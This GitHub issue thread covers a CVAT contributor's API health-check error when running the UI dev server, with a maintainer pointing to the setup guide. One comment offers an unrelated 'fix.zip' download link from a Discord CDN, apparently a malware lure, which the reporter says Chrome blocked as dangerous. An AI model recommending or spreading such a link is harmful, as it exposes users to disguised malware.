### ISSUE TITLE
Errors related to UI changes

### ISSUE THREAD

**Issue by tsune10696** [cvat-ai/cvat#8394]
### Actions before raising this issue

- [X] I searched the existing issues and did not find anything similar.
- [X] I read/searched [the docs](https://docs.cvat.ai/docs/)

### Steps to Reproduce

I'm going to make some small changes of the cvat-ui/src module.
Then I want to confirm the my ui changes is running or not.
I have been trying to follow the following guidelines of cvat/ui module.
https://github.com/cvat-ai/cvat/blob/develop/cvat-ui/README.md
 
But I'm facing the api server health check error when browsing the cvat ui port 3030.
I'm listed some details information with capture.
I would like to know about that what I need to do anything
to start the ui module normally.

![error_details_1](https://github.com/user-attachments/assets/06f2d375-eb75-4301-9805-2c3361bb1ec2)
![error_details_2](https://github.com/user-attachments/assets/65001f0f-5781-4e34-bfc9-bc29bfbd1343)
![error_details_3](https://github.com/user-attachments/assets/33664960-8c2e-461f-9b23-74ab25e322f1)
![error_details_4](https://github.com/user-attachments/assets/41c5d166-850d-40ba-87ab-ce3e6ec2d196)
![error_details_5](https://github.com/user-attachments/assets/313a02b5-50a6-4302-83e7-d4ec9939749f)

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by tsune10696** [comment]
This download was blocked by Chrome because your file is a dangerous file...
![スクリーンショット 2024-09-03 150308](https://github.com/user-attachments/assets/d4e8a739-3f3a-4ee8-ab5b-4639e5c87c6f)

**Comment by azhavoro** [comment]
Hello

Please follow this guide https://docs.cvat.ai/docs/contributing/development-environment/. You do not need to run CVAT with docker compose, except for some services like DB and REDIS, but all steps are detailed in the guide above.

**Comment by tsune10696** [comment]
@azhavoro 

Based on your advice, 
I tried again but got the error shown in the attached image.

![try_1](https://github.com/user-attachments/assets/4fff6dd7-eef9-4bc0-85a0-f7ca29fe94df)
![try_2](https://github.com/user-attachments/assets/ba2eb2e1-b926-4d69-a516-432488639e53)
![try_3](https://github.com/user-attachments/assets/7bf0658d-0e96-459d-9403-8b092ba9bf83)
![try_4](https://github.com/user-attachments/assets/14cf5352-a3b9-4b8d-b7fc-658eaad75359)
![try_5](https://github.com/user-attachments/assets/6e922516-7e52-43a8-b5c1-637ca59ac8b1)

**Comment by tsune10696** [comment]
@azhavoro

I have been trying to follow the guidelines of cvat development environment
that you adviced.
https://docs.cvat.ai/docs/contributing/development-environment/
 
Every Step is running smoothly but I'm facing the same error with previous
after running the last command (yarn run start:cvat-ui).
 
Please advice me anything if you have some doubt.
I already confirmed (at attached image) about that 
cvat server, redis, open policy agent aslo running.
I don't know what I need to start or run some server or service.
